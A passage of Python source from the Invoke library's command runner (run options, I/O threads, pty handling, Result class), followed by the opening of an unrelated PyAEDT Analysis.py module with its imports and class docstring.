Allows the caller to disable ``run``'s default behavior of copying
the subprocess' stdout and stderr to the controlling terminal.
Specify ``hide='out'`` (or ``'stdout'``) to hide only the stdout
stream, ``hide='err'`` (or ``'stderr'``) to hide only stderr, or
``hide='both'`` (or ``True``) to hide both streams.
The default value is ``None``, meaning to print everything;
``False`` will also disable hiding.
.. note::
Stdout and stderr are always captured and stored in the
``Result`` object, regardless of ``hide``'s value.
.. note::
``hide=True`` will also override ``echo=True`` if both are
given (either as kwargs or via config/CLI).
:param bool pty:
By default, ``run`` connects directly to the invoked process and
reads its stdout/stderr streams. Some programs will buffer (or even
behave) differently in this situation compared to using an actual
terminal or pseudoterminal (pty). To use a pty instead of the
default behavior, specify ``pty=True``.
.. warning::
Due to their nature, ptys have a single output stream, so the
ability to tell stdout apart from stderr is **not possible**
when ``pty=True``. As such, all output will appear on
``out_stream`` (see below) and be captured into the ``stdout``
result attribute. ``err_stream`` and ``stderr`` will always be
empty when ``pty=True``.
:param bool fallback:
Controls auto-fallback behavior re: problems offering a pty when
``pty=True``. Whether this has any effect depends on the specific
`Runner` subclass being invoked. Default: ``True``.
:param bool echo:
Controls whether `.run` prints the command string to local stdout
prior to executing it. Default: ``False``.
.. note::
``hide=True`` will override ``echo=True`` if both are given.
:param dict env:
By default, subprocesses recieve a copy of Invoke's own environment
(i.e. ``os.environ``). Supply a dict here to update that child
environment.
For example, ``run('command', env={'PYTHONPATH':
'/some/virtual/env/maybe'})`` would modify the ``PYTHONPATH`` env
var, with the rest of the child's env looking identical to the
parent.
.. seealso:: ``replace_env`` for changing 'update' to 'replace'.
:param bool replace_env:
When ``True``, causes the subprocess to receive the dictionary
given to ``env`` as its entire shell environment, instead of
updating a copy of ``os.environ`` (which is the default behavior).
Default: ``False``.
:param str encoding:
Override auto-detection of which encoding the subprocess is using
for its stdout/stderr streams (which defaults to the return value
of `default_encoding`).
:param out_stream:
A file-like stream object to which the subprocess' standard output
should be written. If ``None`` (the default), ``sys.stdout`` will
be used.
:param err_stream:
Same as ``out_stream``, except for standard error, and defaulting
to ``sys.stderr``.
:param in_stream:
A file-like stream object to used as the subprocess' standard
input. If ``None`` (the default), ``sys.stdin`` will be used.
If ``False``, will disable stdin mirroring entirely (though other
functionality which writes to the subprocess' stdin, such as
autoresponding, will still function.) Disabling stdin mirroring can
help when ``sys.stdin`` is a misbehaving non-stream object, such as
under test harnesses or headless command runners.
:param watchers:
A list of `.StreamWatcher` instances which will be used to scan the
program's ``stdout`` or ``stderr`` and may write into its ``stdin``
(typically ``str`` or ``bytes`` objects depending on Python
version) in response to patterns or other heuristics.
See :doc:`/concepts/watchers` for details on this functionality.
Default: ``[]``.
:param bool echo_stdin:
Whether to write data from ``in_stream`` back to ``out_stream``.
In other words, in normal interactive usage, this parameter
controls whether Invoke mirrors what you type back to your
terminal.
By default (when ``None``), this behavior is triggered by the
following:
* Not using a pty to run the subcommand (i.e. ``pty=False``),
as ptys natively echo stdin to stdout on their own;
* And when the controlling terminal of Invoke itself (as per
``in_stream``) appears to be a valid terminal device or TTY.
(Specifically, when `~invoke.util.isatty` yields a ``True``
result when given ``in_stream``.)
.. note::
This property tends to be ``False`` when piping another
program's output into an Invoke session, or when running
Invoke within another program (e.g. running Invoke from
itself).
If both of those properties are true, echoing will occur; if either
is false, no echoing will be performed.
When not ``None``, this parameter will override that auto-detection
and force, or disable, echoing.
:returns:
`Result`, or a subclass thereof.
:raises:
`.UnexpectedExit`, if the command exited nonzero and
``warn`` was ``False``.
:raises:
`.Failure`, if the command didn't even exit cleanly, e.g. if a
`.StreamWatcher` raised `.WatcherError`.
:raises:
`.ThreadException` (if the background I/O threads encountered
exceptions other than `.WatcherError`).
"""
try:
return self._run_body(command, **kwargs)
finally:
self.stop()
def _run_body(self, command, **kwargs):
# Normalize kwargs w/ config
opts, out_stream, err_stream, in_stream = self._run_opts(kwargs)
shell = opts['shell']
# Environment setup
env = self.generate_env(opts['env'], opts['replace_env'])
# Echo running command
if opts['echo']:
print("\033[1;37m{}\033[0m".format(command))
# Start executing the actual command (runs in background)
self.start(command, shell, env)
# Arrive at final encoding if neither config nor kwargs had one
self.encoding = opts['encoding'] or self.default_encoding()
# Set up IO thread parameters (format - body_func: {kwargs})
stdout, stderr = [], []
thread_args = {
self.handle_stdout: {
'buffer_': stdout,
'hide': 'stdout' in opts['hide'],
'output': out_stream,
},
}
# After opt processing above, in_stream will be a real stream obj or
# False, so we can truth-test it. We don't even create a stdin-handling
# thread if it's False, meaning user indicated stdin is nonexistent or
# problematic.
if in_stream:
thread_args[self.handle_stdin] = {
'input_': in_stream,
'output': out_stream,
'echo': opts['echo_stdin'],
}
if not self.using_pty:
thread_args[self.handle_stderr] = {
'buffer_': stderr,
'hide': 'stderr' in opts['hide'],
'output': err_stream,
}
# Kick off IO threads
self.threads = {}
exceptions = []
for target, kwargs in six.iteritems(thread_args):
t = ExceptionHandlingThread(target=target, kwargs=kwargs)
self.threads[target] = t
t.start()
# Wait for completion, then tie things off & obtain result
# And make sure we perform that tying off even if things asplode.
exception = None
while True:
try:
self.wait()
break # done waiting!
# NOTE: we handle all this now instead of at
# actual-exception-handling time because otherwise the stdout/err
# reader threads may block until the subprocess exits.
# TODO: honor other signals sent to our own process and transmit
# them to the subprocess before handling 'normally'.
except KeyboardInterrupt as e:
self.send_interrupt(e)
# NOTE: no break; we want to return to self.wait()
except BaseException as e: # Want to handle SystemExit etc still
# Store exception for post-shutdown reraise
exception = e
# Break out of return-to-wait() loop - we want to shut down
break
# Inform stdin-mirroring worker to stop its eternal looping
self.program_finished.set()
# Join threads, setting a timeout if necessary
for target, thread in six.iteritems(self.threads):
thread.join(self._thread_timeout(target))
e = thread.exception()
if e is not None:
exceptions.append(e)
# If we got a main-thread exception while wait()ing, raise it now that
# we've closed our worker threads.
if exception is not None:
raise exception
# Strip out WatcherError from any thread exceptions; they are bundled
# into Failure handling at the end.
watcher_errors = []
thread_exceptions = []
for exception in exceptions:
real = exception.value
if isinstance(real, WatcherError):
watcher_errors.append(real)
else:
thread_exceptions.append(exception)
# If any exceptions appeared inside the threads, raise them now as an
# aggregate exception object.
if thread_exceptions:
raise ThreadException(thread_exceptions)
# At this point, we had enough success that we want to be returning or
# raising detailed info about our execution; so we generate a Result.
stdout = ''.join(stdout)
stderr = ''.join(stderr)
if WINDOWS:
# "Universal newlines" - replace all standard forms of
# newline with \n. This is not technically Windows related
# (\r as newline is an old Mac convention) but we only apply
# the translation for Windows as that's the only platform
# it is likely to matter for these days.
stdout = stdout.replace("\r\n", "\n").replace("\r", "\n")
stderr = stderr.replace("\r\n", "\n").replace("\r", "\n")
# Get return/exit code, unless there were WatcherErrors to handle.
# NOTE: In that case, returncode() may block waiting on the process
# (which may be waiting for user input). Since most WatcherError
# situations lack a useful exit code anyways, skipping this doesn't
# really hurt any.
exited = None if watcher_errors else self.returncode()
# Obtain actual result
result = self.generate_result(
command=command,
shell=shell,
env=env,
stdout=stdout,
stderr=stderr,
exited=exited,
pty=self.using_pty,
hide=opts['hide'],
encoding=self.encoding,
)
# Any presence of WatcherError from the threads indicates a watcher was
# upset and aborted execution; make a generic Failure out of it and
# raise that.
if watcher_errors:
# TODO: ambiguity exists if we somehow get WatcherError in *both*
# threads...as unlikely as that would normally be.
raise Failure(result, reason=watcher_errors[0])
if not (result or opts['warn']):
raise UnexpectedExit(result)
return result
def _run_opts(self, kwargs):
"""
Unify `run` kwargs with config options to arrive at local options.
:returns:
Four-tuple of ``(opts_dict, stdout_stream, stderr_stream,
stdin_stream)``.
"""
opts = {}
for key, value in six.iteritems(self.context.config.run):
runtime = kwargs.pop(key, None)
opts[key] = value if runtime is None else runtime
# Handle invalid kwarg keys (anything left in kwargs).
# Act like a normal function would, i.e. TypeError
if kwargs:
err = "run() got an unexpected keyword argument '{}'"
raise TypeError(err.format(list(kwargs.keys())[0]))
# If hide was True, turn off echoing
if opts['hide'] is True:
opts['echo'] = False
# Then normalize 'hide' from one of the various valid input values,
# into a stream-names tuple.
opts['hide'] = normalize_hide(opts['hide'])
# Derive stream objects
out_stream = opts['out_stream']
if out_stream is None:
out_stream = sys.stdout
err_stream = opts['err_stream']
if err_stream is None:
err_stream = sys.stderr
in_stream = opts['in_stream']
if in_stream is None:
in_stream = sys.stdin
# Determine pty or no
self.using_pty = self.should_use_pty(opts['pty'], opts['fallback'])
if opts['watchers']:
self.watchers = opts['watchers']
return opts, out_stream, err_stream, in_stream
def _thread_timeout(self, target):
# Add a timeout to out/err thread joins when it looks like they're not
# dead but their counterpart is dead; this indicates issue #351 (fixed
# by #432) where the subproc may hang because its stdout (or stderr) is
# no longer being consumed by the dead thread (and a pipe is filling
# up.) In that case, the non-dead thread is likely to block forever on
# a `recv` unless we add this timeout.
if target == self.handle_stdin:
return None
opposite = self.handle_stderr
if target == self.handle_stderr:
opposite = self.handle_stdout
if opposite in self.threads and self.threads[opposite].is_dead:
return 1
return None
def generate_result(self, **kwargs):
"""
Create & return a suitable `Result` instance from the given ``kwargs``.
Subclasses may wish to override this in order to manipulate things or
generate a `Result` subclass (e.g. ones containing additional metadata
besides the default).
"""
return Result(**kwargs)
def read_proc_output(self, reader):
"""
Iteratively read & decode bytes from a subprocess' out/err stream.
:param reader:
A literal reader function/partial, wrapping the actual stream
object in question, which takes a number of bytes to read, and
returns that many bytes (or ``None``).
``reader`` should be a reference to either `read_proc_stdout` or
`read_proc_stderr`, which perform the actual, platform/library
specific read calls.
:returns:
A generator yielding Unicode strings (`unicode` on Python 2; `str`
on Python 3).
Specifically, each resulting string is the result of decoding
`read_chunk_size` bytes read from the subprocess' out/err stream.
"""
# NOTE: Typically, reading from any stdout/err (local, remote or
# otherwise) can be thought of as "read until you get nothing back".
# This is preferable over "wait until an out-of-band signal claims the
# process is done running" because sometimes that signal will appear
# before we've actually read all the data in the stream (i.e.: a race
# condition).
while True:
data = reader(self.read_chunk_size)
if not data:
break
yield self.decode(data)
def write_our_output(self, stream, string):
"""
Write ``string`` to ``stream``.
Also calls ``.flush()`` on ``stream`` to ensure that real terminal
streams don't buffer.
:param stream:
A file-like stream object, mapping to the ``out_stream`` or
``err_stream`` parameters of `run`.
:param string: A Unicode string object.
:returns: ``None``.
"""
stream.write(encode_output(string, self.encoding))
stream.flush()
def _handle_output(self, buffer_, hide, output, reader):
# TODO: store un-decoded/raw bytes somewhere as well...
for data in self.read_proc_output(reader):
# Echo to local stdout if necessary
# TODO: should we rephrase this as "if you want to hide, give me a
# dummy output stream, e.g. something like /dev/null"? Otherwise, a
# combo of 'hide=stdout' + 'here is an explicit out_stream' means
# out_stream is never written to, and that seems...odd.
if not hide:
self.write_our_output(stream=output, string=data)
# Store in shared buffer so main thread can do things with the
# result after execution completes.
# NOTE: this is threadsafe insofar as no reading occurs until after
# the thread is join()'d.
buffer_.append(data)
# Run our specific buffer through the autoresponder framework
self.respond(buffer_)
def handle_stdout(self, buffer_, hide, output):
"""
Read process' stdout, storing into a buffer & printing/parsing.
Intended for use as a thread target. Only terminates when all stdout
from the subprocess has been read.
:param buffer_: The capture buffer shared with the main thread.
:param bool hide: Whether or not to replay data into ``output``.
:param output:
Output stream (file-like object) to write data into when not
hiding.
:returns: ``None``.
"""
self._handle_output(
buffer_,
hide,
output,
reader=self.read_proc_stdout,
)
def handle_stderr(self, buffer_, hide, output):
"""
Read process' stderr, storing into a buffer & printing/parsing.
Identical to `handle_stdout` except for the stream read from; see its
docstring for API details.
"""
self._handle_output(
buffer_,
hide,
output,
reader=self.read_proc_stderr,
)
def read_our_stdin(self, input_):
"""
Read & decode bytes from a local stdin stream.
:param input_:
Actual stream object to read from. Maps to ``in_stream`` in `run`,
so will often be ``sys.stdin``, but might be any stream-like
object.
:returns:
A Unicode string, the result of decoding the read bytes (this might
be the empty string if the pipe has closed/reached EOF); or
``None`` if stdin wasn't ready for reading yet.
"""
# TODO: consider moving the character_buffered contextmanager call in
# here? Downside is it would be flipping those switches for every byte
# read instead of once per session, which could be costly (?).
bytes_ = None
if ready_for_reading(input_):
bytes_ = input_.read(bytes_to_read(input_))
# Decode if it appears to be binary-type. (From real terminal
# streams, usually yes; from file-like objects, often no.)
if bytes_ and isinstance(bytes_, six.binary_type):
# TODO: will decoding 1 byte at a time break multibyte
# character encodings? How to square interactivity with that?
bytes_ = self.decode(bytes_)
return bytes_
def handle_stdin(self, input_, output, echo):
"""
Read local stdin, copying into process' stdin as necessary.
Intended for use as a thread target.
.. note::
Because real terminal stdin streams have no well-defined "end", if
such a stream is detected (based on existence of a callable
``.fileno()``) this method will wait until `program_finished` is
set, before terminating.
When the stream doesn't appear to be from a terminal, the same
semantics as `handle_stdout` are used - the stream is simply
``read()`` from until it returns an empty value.
:param input_: Stream (file-like object) from which to read.
:param output: Stream (file-like object) to which echoing may occur.
:param bool echo: User override option for stdin-stdout echoing.
:returns: ``None``.
"""
# TODO: reinstate lock/whatever thread logic from fab v1 which prevents
# reading from stdin while other parts of the code are prompting for
# runtime passwords? (search for 'input_enabled')
# TODO: fabric#1339 is strongly related to this, if it's not literally
# exposing some regression in Fabric 1.x itself.
with character_buffered(input_):
while True:
data = self.read_our_stdin(input_)
if data:
# Mirror what we just read to process' stdin.
# We perform an encode so Python 3 gets bytes (streams +
# str's in Python 3 == no bueno) but skip the decode step,
# since there's presumably no need (nobody's interacting
# with this data programmatically).
self.write_proc_stdin(data)
# Also echo it back to local stdout (or whatever
# out_stream is set to) when necessary.
if echo is None:
echo = self.should_echo_stdin(input_, output)
if echo:
self.write_our_output(stream=output, string=data)
# Empty string/char/byte != None. Can't just use 'else' here.
elif data is not None:
# When reading from file-like objects that aren't "real"
# terminal streams, an empty byte signals EOF.
break
# Dual all-done signals: program being executed is done
# running, *and* we don't seem to be reading anything out of
# stdin. (NOTE: If we only test the former, we may encounter
# race conditions re: unread stdin.)
if self.program_finished.is_set() and not data:
break
# Take a nap so we're not chewing CPU.
time.sleep(self.input_sleep)
def should_echo_stdin(self, input_, output):
"""
Determine whether data read from ``input_`` should echo to ``output``.
Used by `handle_stdin`; tests attributes of ``input_`` and ``output``.
:param input_: Input stream (file-like object).
:param output: Output stream (file-like object).
:returns: A ``bool``.
"""
return (not self.using_pty) and isatty(input_)
def respond(self, buffer_):
"""
Write to the program's stdin in response to patterns in ``buffer_``.
The patterns and responses are driven by the `.StreamWatcher` instances
from the ``watchers`` kwarg of `run` - see :doc:`/concepts/watchers`
for a conceptual overview.
:param buffer:
The capture buffer for this thread's particular IO stream.
:returns: ``None``.
"""
# Join buffer contents into a single string; without this,
# StreamWatcher subclasses can't do things like iteratively scan for
# pattern matches.
# NOTE: using string.join should be "efficient enough" for now, re:
# speed and memory use. Should that become false, consider using
# StringIO or cStringIO (tho the latter doesn't do Unicode well?) which
# is apparently even more efficient.
stream = u''.join(buffer_)
for watcher in self.watchers:
for response in watcher.submit(stream):
self.write_proc_stdin(response)
def generate_env(self, env, replace_env):
"""
Return a suitable environment dict based on user input & behavior.
:param dict env: Dict supplying overrides or full env, depending.
:param bool replace_env:
Whether ``env`` updates, or is used in place of, the value of
`os.environ`.
:returns: A dictionary of shell environment vars.
"""
return env if replace_env else dict(os.environ, **env)
def should_use_pty(self, pty, fallback):
"""
Should execution attempt to use a pseudo-terminal?
:param bool pty:
Whether the user explicitly asked for a pty.
:param bool fallback:
Whether falling back to non-pty execution should be allowed, in
situations where ``pty=True`` but a pty could not be allocated.
"""
# NOTE: fallback not used: no falling back implemented by default.
return pty
@property
def has_dead_threads(self):
"""
Detect whether any IO threads appear to have terminated unexpectedly.
Used during process-completion waiting (in `wait`) to ensure we don't
deadlock our child process if our IO processing threads have
errored/died.
:returns:
``True`` if any threads appear to have terminated with an
exception, ``False`` otherwise.
"""
return any(x.is_dead for x in self.threads.values())
def wait(self):
"""
Block until the running command appears to have exited.
:returns: ``None``.
"""
while True:
proc_finished = self.process_is_finished
dead_threads = self.has_dead_threads
if proc_finished or dead_threads:
break
time.sleep(self.input_sleep)
def write_proc_stdin(self, data):
"""
Write encoded ``data`` to the running process' stdin.
:param data: A Unicode string.
:returns: ``None``.
"""
# Encode always, then request implementing subclass to perform the
# actual write to subprocess' stdin.
self._write_proc_stdin(data.encode(self.encoding))
def decode(self, data):
"""
Decode some ``data`` bytes, returning Unicode.
"""
# NOTE: yes, this is a 1-liner. The point is to make it much harder to
# forget to use 'replace' when decoding :)
return data.decode(self.encoding, 'replace')
@property
def process_is_finished(self):
"""
Determine whether our subprocess has terminated.
.. note::
The implementation of this method should be nonblocking, as it is
used within a query/poll loop.
:returns:
``True`` if the subprocess has finished running, ``False``
otherwise.
"""
raise NotImplementedError
def start(self, command, shell, env):
"""
Initiate execution of ``command`` (via ``shell``, with ``env``).
Typically this means use of a forked subprocess or requesting start of
execution on a remote system.
In most cases, this method will also set subclass-specific member
variables used in other methods such as `wait` and/or `returncode`.
"""
raise NotImplementedError
def read_proc_stdout(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stdout stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
"""
raise NotImplementedError
def read_proc_stderr(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stderr stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
"""
raise NotImplementedError
def _write_proc_stdin(self, data):
"""
Write ``data`` to running process' stdin.
This should never be called directly; it's for subclasses to implement.
See `write_proc_stdin` for the public API call.
:param data: Already-encoded byte data suitable for writing.
:returns: ``None``.
"""
raise NotImplementedError
def default_encoding(self):
"""
Return a string naming the expected encoding of subprocess streams.
This return value should be suitable for use by encode/decode methods.
"""
# TODO: probably wants to be 2 methods, one for local and one for
# subprocess. For now, good enough to assume both are the same.
#
# Based on some experiments there is an issue with
# `locale.getpreferredencoding(do_setlocale=False)` in Python 2.x on
# Linux and OS X, and `locale.getpreferredencoding(do_setlocale=True)`
# triggers some global state changes. (See #274 for discussion.)
encoding = locale.getpreferredencoding(False)
if six.PY2 and not WINDOWS:
default = locale.getdefaultlocale()[1]
if default is not None:
encoding = default
return encoding
def send_interrupt(self, interrupt):
"""
Submit an interrupt signal to the running subprocess.
In almost all implementations, the default behavior is what will be
desired: submit ``\x03`` to the subprocess' stdin pipe. However, we
leave this as a public method in case this default needs to be
augmented or replaced.
:param interrupt:
The locally-sourced ``KeyboardInterrupt`` causing the method call.
:returns: ``None``.
"""
self.write_proc_stdin(u'\x03')
def returncode(self):
"""
Return the numeric return/exit code resulting from command execution.
:returns: `int`
"""
raise NotImplementedError
def stop(self):
"""
Perform final cleanup, if necessary.
This method is called within a ``finally`` clause inside the main `run`
method. Depending on the subclass, it may be a no-op, or it may do
things such as close network connections or open files.
:returns: ``None``
"""
raise NotImplementedError
class Local(Runner):
"""
Execute a command on the local system in a subprocess.
.. note::
When Invoke itself is executed without a controlling terminal (e.g.
when ``sys.stdin`` lacks a useful ``fileno``), it's not possible to
present a handle on our PTY to local subprocesses. In such situations,
`Local` will fallback to behaving as if ``pty=False`` (on the theory
that degraded execution is better than none at all) as well as printing
a warning to stderr.
To disable this behavior, say ``fallback=False``.
"""
def __init__(self, context):
super(Local, self).__init__(context)
# Bookkeeping var for pty use case
self.status = None
def should_use_pty(self, pty=False, fallback=True):
use_pty = False
if pty:
use_pty = True
# TODO: pass in & test in_stream, not sys.stdin
if not has_fileno(sys.stdin) and fallback:
if not self.warned_about_pty_fallback:
sys.stderr.write("WARNING: stdin has no fileno; falling back to non-pty execution!\n") # noqa
self.warned_about_pty_fallback = True
use_pty = False
return use_pty
def read_proc_stdout(self, num_bytes):
# Obtain useful read-some-bytes function
if self.using_pty:
# Need to handle spurious OSErrors on some Linux platforms.
try:
data = os.read(self.parent_fd, num_bytes)
except OSError as e:
# Only eat I/O specific OSErrors so we don't hide others
stringified = str(e)
io_errors = (
# The typical default
"Input/output error",
# Some less common platforms phrase it this way
"I/O error",
)
if not any(error in stringified for error in io_errors):
raise
# The bad OSErrors happen after all expected output has
# appeared, so we return a falsey value, which triggers the
# "end of output" logic in code using reader functions.
data = None
else:
data = os.read(self.process.stdout.fileno(), num_bytes)
return data
def read_proc_stderr(self, num_bytes):
# NOTE: when using a pty, this will never be called.
# TODO: do we ever get those OSErrors on stderr? Feels like we could?
return os.read(self.process.stderr.fileno(), num_bytes)
def _write_proc_stdin(self, data):
# NOTE: parent_fd from os.fork() is a read/write pipe attached to our
# forked process' stdout/stdin, respectively.
fd = self.parent_fd if self.using_pty else self.process.stdin.fileno()
# Try to write, ignoring broken pipes if encountered (implies child
# process exited before the process piping stdin to us finished;
# there's nothing we can do about that!)
try:
return os.write(fd, data)
except OSError as e:
if 'Broken pipe' not in str(e):
raise
def start(self, command, shell, env):
if self.using_pty:
if pty is None: # Encountered ImportError
sys.exit("You indicated pty=True, but your platform doesn't support the 'pty' module!") # noqa
cols, rows = pty_size()
self.pid, self.parent_fd = pty.fork()
# If we're the child process, load up the actual command in a
# shell, just as subprocess does; this replaces our process - whose
# pipes are all hooked up to the PTY - with the "real" one.
if self.pid == 0:
# TODO: both pty.spawn() and pexpect.spawn() do a lot of
# setup/teardown involving tty.setraw, getrlimit, signal.
# Ostensibly we'll want some of that eventually, but if
# possible write tests - integration-level if necessary -
# before adding it!
#
# Set pty window size based on what our own controlling
# terminal's window size appears to be.
# TODO: make subroutine?
winsize = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(sys.stdout.fileno(), termios.TIOCSWINSZ, winsize)
# Use execve for bare-minimum "exec w/ variable # args + env"
# behavior. No need for the 'p' (use PATH to find executable)
# for now.
# TODO: see if subprocess is using equivalent of execvp...
os.execve(shell, [shell, '-c', command], env)
else:
self.process = Popen(
command,
shell=True,
executable=shell,
env=env,
stdout=PIPE,
stderr=PIPE,
stdin=PIPE,
)
@property
def process_is_finished(self):
if self.using_pty:
# NOTE:
# https://github.com/pexpect/ptyprocess/blob/4058faa05e2940662ab6da1330aa0586c6f9cd9c/ptyprocess/ptyprocess.py#L680-L687
# implies that Linux "requires" use of the blocking, non-WNOHANG
# version of this call. Our testing doesn't verify this, however,
# so...
# NOTE: It does appear to be totally blocking on Windows, so our
# issue #351 may be totally unsolvable there. Unclear.
pid_val, self.status = os.waitpid(self.pid, os.WNOHANG)
return pid_val != 0
else:
return self.process.poll() is not None
def returncode(self):
if self.using_pty:
# No subprocess.returncode available; use WIFEXITED/WIFSIGNALED to
# determine whch of WEXITSTATUS / WTERMSIG to use.
# TODO: is it safe to just say "call all WEXITSTATUS/WTERMSIG and
# return whichever one of them is nondefault"? Probably not?
# NOTE: doing this in an arbitrary order should be safe since only
# one of the WIF* methods ought to ever return True.
code = None
if os.WIFEXITED(self.status):
code = os.WEXITSTATUS(self.status)
elif os.WIFSIGNALED(self.status):
code = os.WTERMSIG(self.status)
# Match subprocess.returncode by turning signals into negative
# 'exit code' integers.
code = -1 * code
return code
# TODO: do we care about WIFSTOPPED? Maybe someday?
else:
return self.process.returncode
def stop(self):
# No explicit close-out required (so far).
pass
class Result(object):
"""
A container for information about the result of a command execution.
All params are exposed as attributes of the same name and type.
:param str stdout:
The subprocess' standard output.
:param str stderr:
Same as ``stdout`` but containing standard error (unless the process
was invoked via a pty, in which case it will be empty; see
`.Runner.run`.)
:param str encoding:
The string encoding used by the local shell environment.
:param str command:
The command which was executed.
:param str shell:
The shell binary used for execution.
:param dict env:
The shell environment used for execution. (Default is the empty dict,
``{}``, not ``None`` as displayed in the signature.)
:param int exited:
An integer representing the subprocess' exit/return code.
:param bool pty:
A boolean describing whether the subprocess was invoked with a pty or
not; see `.Runner.run`.
:param tuple hide:
A tuple of stream names (none, one or both of ``('stdout', 'stderr')``)
which were hidden from the user when the generating command executed;
this is a normalized value derived from the ``hide`` parameter of
`.Runner.run`.
For example, ``run('command', hide='stdout')`` will yield a `Result`
where ``result.hide == ('stdout',)``; ``hide=True`` or ``hide='both'``
results in ``result.hide == ('stdout', 'stderr')``; and ``hide=False``
(the default) generates ``result.hide == ()`` (the empty tuple.)
.. note::
`Result` objects' truth evaluation is equivalent to their `.ok`
attribute's value. Therefore, quick-and-dirty expressions like the
following are possible::
if run("some shell command"):
do_something()
else:
handle_problem()
However, remember `Zen of Python #2
<http://zen-of-python.info/explicit-is-better-than-implicit.html#2>`_.
"""
# TODO: inherit from namedtuple instead? heh (or: use attrs from pypi)
def __init__(
self,
stdout="",
stderr="",
encoding=None,
command="",
shell="",
env=None,
exited=0,
pty=False,
hide=tuple(),
):
self.stdout = stdout
self.stderr = stderr
self.encoding = encoding
self.command = command
self.shell = shell
self.env = {} if env is None else env
self.exited = exited
self.pty = pty
self.hide = hide
@property
def return_code(self):
"""
An alias for ``.exited``.
"""
return self.exited
def __nonzero__(self):
# NOTE: This is the method that (under Python 2) determines Boolean
# behavior for objects.
return self.ok
def __bool__(self):
# NOTE: And this is the Python 3 equivalent of __nonzero__. Much better
# name...
return self.__nonzero__()
def __str__(self):
if self.exited is not None:
desc = "Command exited with status {}.".format(self.exited)
else:
desc = "Command was not fully executed due to watcher error."
ret = [desc]
for x in ('stdout', 'stderr'):
val = getattr(self, x)
ret.append(u"""=== {} ===
{}
""".format(x, val.rstrip()) if val else u"(no {})".format(x))
return u"\n".join(ret)
def __repr__(self):
# TODO: more? e.g. len of stdout/err? (how to represent cleanly in a
# 'x=y' format like this? e.g. '4b' is ambiguous as to what it
# represents
template = "<Result cmd={!r} exited={}>"
return template.format(self.command, self.exited)
@property
def ok(self):
"""
A boolean equivalent to ``exited == 0``.
"""
return self.exited == 0
@property
def failed(self):
"""
The inverse of ``ok``.
I.e., ``True`` if the program exited with a nonzero return code, and
``False`` otherwise.
"""
return not self.ok
def normalize_hide(val):
hide_vals = (None, False, 'out', 'stdout', 'err', 'stderr', 'both', True)
if val not in hide_vals:
err = "'hide' got {!r} which is not in {!r}"
raise ValueError(err.format(val, hide_vals))
if val in (None, False):
hide = ()
elif val in ('both', True):
hide = ('stdout', 'stderr')
elif val == 'out':
hide = ('stdout',)
elif val == 'err':
hide = ('stderr',)
else:
hide = (val,)
return hide
|
Analysis.py
|
"""
This module contains the ``analysis`` class.
It includes common classes for file management and messaging and all
calls to AEDT modules like the modeler, mesh, postprocessing, and setup.
"""
from __future__ import absolute_import # noreorder
import os
import shutil
import threading
import warnings
from collections import OrderedDict
from pyaedt.application.Design import Design
from pyaedt.application.JobManager import update_hpc_option
from pyaedt.generic.constants import AXIS
from pyaedt.generic.constants import CoordinateSystemAxis
from pyaedt.generic.constants import CoordinateSystemPlane
from pyaedt.generic.constants import GRAVITY
from pyaedt.generic.constants import GravityDirection
from pyaedt.generic.constants import PLANE
from pyaedt.generic.constants import Plane
from pyaedt.generic.constants import SETUPS
from pyaedt.generic.constants import SOLUTIONS
from pyaedt.generic.constants import VIEW
from pyaedt.generic.general_methods import filter_tuple
from pyaedt.generic.general_methods import generate_unique_name
from pyaedt.generic.general_methods import pyaedt_function_handler
from pyaedt.modules.Boundary import NativeComponentObject
from pyaedt.modules.DesignXPloration import OptimizationSetups
from pyaedt.modules.DesignXPloration import ParametricSetups
from pyaedt.modules.MaterialLib import Materials
from pyaedt.modules.SolveSetup import Setup
class Analysis(Design, object):
"""Contains all common analysis functions.
This class is inherited in the caller application and is accessible through it ( eg. ``hfss.method_name``).
It is automatically initialized by a call from an application, such as HFSS or Q3D.
See the application function for its parameter descriptions.
Parameters
----------
application : str
Application that is to initialize the call.
projectname : str
Name of the project to select or the full path to the project
or AEDTZ archive to open.
designname : str
Name of the design to select.
solution_type : str
Solution type to apply to the design.
setup_name : str
Name of the setup to use as the nominal.
specified_version : str
Version of AEDT to use.
NG : bool
Whether to run AEDT in the non-graphical mode.
new_desktop_session : bool
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine.
close_on_exit : bool
Whether to release AEDT on exit.
student_version : bool
Whether to enable the student version of AEDT.
aedt_process_id : int, optional
Only used when ``new_desktop_session = False``, specifies by process ID which instance
of Electronics Desktop to point PyAEDT at.
"""
def __init__(
self,
application,
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
machine="",
port=0,
aedt_process_id=None,
):
self.setups = []
Design.__init__(
self,
application,
projectname,
designname,
solution_type,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
machine,
port,
aedt_process_id,
)
self.logger.info("Design Loaded")
self._setup = None
if setup_name:
self.analysis_setup = setup_name
self._materials = Materials(self)
self.logger.info("Materials Loaded")
self._available_variations = self.AvailableVariations(self)
if self.design_type != "Maxwell Circuit":
self.setups = [self.get_setup(setup_name) for setup_name in self.setup_names]
self.parametrics = ParametricSetups(self)
self.optimizations = OptimizationSetups(self)
self._native_components = []
self.SOLUTIONS = SOLUTIONS()
self.SETUPS = SETUPS()
self.AXIS = AXIS()
self.PLANE = PLANE()
self.VIEW = VIEW()
self.GRAVITY = GRAVITY()
@property
def native_components(self):
"""Native Component dictionary.
Returns
-------
dict[str, :class:`pyaedt.modules.Boundaries.NativeComponentObject`]
"""
if not self._native_components:
self._native_components = self._get_native_data()
return self._native_components
@property
def output_variables(self):
"""List of output variables.
Returns
-------
list of str
References
----------
>>> oModule.GetOutputVariables()
"""
return self.ooutput_variable.GetOutputVariables()
@property
def materials(self):
"""Materials in the project.
Returns
-------
:class:`pyaedt.modules.MaterialLib.Materials`
Materials in the project.
"""
return self._materials
@property
def Position(self):
"""Position of the object.
Returns
-------
type
Position object.
"""
return self.modeler.Position
@property
def available_variations(self):
"""Available variation object.
Returns
-------
:class:`pyaedt.application.Analysis.Analysis.AvailableVariations`
Available variation object.
"""
return self._available_variations
@property
def CoordinateSystemAxis(self):
"""Coordinate system axis constant.
.. deprecated:: 0.4.8
Use :attr:`AXIS` instead.
